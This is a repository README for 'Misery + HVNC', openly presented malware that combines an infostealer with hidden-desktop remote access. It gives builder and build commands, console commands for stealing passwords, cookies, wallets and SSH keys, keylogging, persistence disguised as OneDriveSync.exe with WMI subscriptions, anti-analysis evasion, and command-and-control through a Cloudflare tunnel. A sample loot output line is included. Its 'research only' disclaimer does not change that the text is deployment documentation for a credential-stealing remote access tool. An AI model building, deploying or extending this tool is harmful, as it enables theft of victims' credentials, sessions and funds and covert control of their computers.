Files
JYenn-Misery/README.md
T

155 lines
5.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Misery + HVNC
<p align="center">
<img src="Misery.png" alt="Misery" width="420">
<br>
<em>a devoted sister of the Church of Malware</em>
</p>
HVNC inspired by Ek0m's research, rebuilt on top of the Misery stealer.
- Hidden desktop (`hvnc start`): run any app on a hidden desktop and watch it live
- Ghosted browser (`ghost <url>`): real Chrome/Edge session using the victim's cookies and logins
- Credential and app-session harvesting (Misery stealer pipeline)
- Single encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
- Keylogger + clipboard monitoring
- Persistence (HKCU Run key + WMI event subscriptions)
- Anti-analysis (user-mode environment checks before connect)
- Reflective injection / offline DPAPI fallback for decryption
For local testing and research only.
## Disclaimer
Educational/research use only. Run only on systems you own or have written permission to test, in an isolated lab. Authors take no responsibility for misuse.
## Operator view
The console's live hidden-desktop feed, streamed from the agent and rendered in the view window:
<p align="center">
<img src="MiseryLiveOperatorView.png" alt="Misery operator view" width="1000">
</p>
## VirusTotal scan
<p align="center">
<img src="MiseryVT.png" alt="VirusTotal scan result" width="1000">
</p>
## Which session to use
| | Ghosted session (`ghost <url>`) | Hidden desktop (`hvnc start`) |
|---|---|---|
| Profile | Snapshot copy of the victim's profile (deleted on stop) | Victim's real, live profile |
| Browser | Chrome / Edge only | Any app + full desktop (explorer + Start menu) |
| Collides with open browser? | No | Yes (profile lock / two-instance conflict) |
| Writes back to profile? | No | Yes (history, cookies, sign-outs persist) |
| Use when | Authenticated browser session only | Full hidden desktop or non-browser app |
The stealer runs inside the browser via reflective injection when possible (passes process checks). Falls back to offline DPAPI in the agent process otherwise. Everything goes over one encrypted channel: agent streams frames/results, console forwards input and writes exfil to disk.
## Quick start
`setup.py` is an msfvenom-style builder that writes `src/config.h`, the console's ECDH private key to `.misery_key`, and builds the project.
```powershell
python setup.py -g
# or non-interactive:
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent
```
```powershell
.\build\console.exe # listener
.\build\agent.exe # connects
```
Console is a terminal (`misery > ` prompt). Live view window opens for the hidden-desktop feed; input is forwarded.
Commands: `steal`, `hvnc start | stop | launch [path]`, `ghost <url> | stop`, `keylog`, `clip`, `clear`, `exit` (type `help` for full list).
Steal summary example:
```
[+] steal done: 0 pw / 0 ck / 0 cards / 2 discord / 1 steam / 1 wallets / 1 wifi / 1 ssh / 1 vscode / 0 telegram / 0 slack / 0 signal / 0 aws -> loot-20260812_001608.json
```
## Configuration
Priority: CLI (`agent <host> [port]`) > env (`HVNC_C2_HOST`, `HVNC_C2_PORT`) > `src/config.h` (generated by `setup.py`).
- Keypair lives only on the operator side (`.misery_key`, gitignored). Only the public half is compiled into the agent.
- Each TCP connection does a plaintext `KEY_EXCHANGE` with the agent's ephemeral key → AES-256-GCM session key.
- `--rotate-key` generates a new pair (orphans existing agents).
## Persistence
Separate agent modes (register and exit):
| Flag | Effect |
|---|---|
| `--persist` / `--unpersist` | HKCU Run key (T1547.001). Copies to `%APPDATA%\OneDriveSync.exe` |
| `--persist-wmi` / `--unpersist-wmi` | Two WMI subscriptions (T1546.003): 15-min timer + guard that recreates the Run value |
Both point at the same `%APPDATA%` copy. Guard is idempotent.
## CDN transport (Cloudflare)
```powershell
python setup.py -t https_cdn
```
Emits `deploy/worker.js` + `deploy/cloudflared-config.yml`.
```
agent ──HTTPS──▶ Cloudflare Worker ──▶ Zero Trust Tunnel ──▶ console
```
Beacon carries the agent's ephemeral public key so the console can re-derive the session key. Worker validates an auth header and redirects through the tunnel (no public IP needed on the console).
## Build
Requires `cmake`, C++ toolchain, and `objcopy`/`llvm-objcopy`.
MSVC:
```powershell
cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release
```
MinGW:
```powershell
cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release -DCMAKE_OBJCOPY="C:\path\to\objcopy.exe"
cmake --build build --config Release -- -j 4
```
Fresh checkout builds out of the box against `127.0.0.1:4444`. Run `setup.py` once before the first live session so `.misery_key` exists.
## Outputs
Written by the console in its working directory:
- `loot-<timestamp>.json` (gitignored)
- `keylog.txt`
Tested on Chrome/Edge, Windows 10/11 x64.
## Layout
- `src/agent` – entry, C2 client, injector, persistence
- `src/console` – operator console + listener
- `src/payload` – payload DLL, reflective loader, trampoline
- `src/stealer` – Misery-derived sources
- `src/hvnc` – hidden-desktop session
- `src/ghost` – ghosted browser session
- `src/rat` – keylogger + clipboard
- `src/transport` – encrypted TCP framing + compression
- `src/evasion` – indirect syscalls, anti-analysis, helpers
- `build/` – out-of-source build dir
## Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.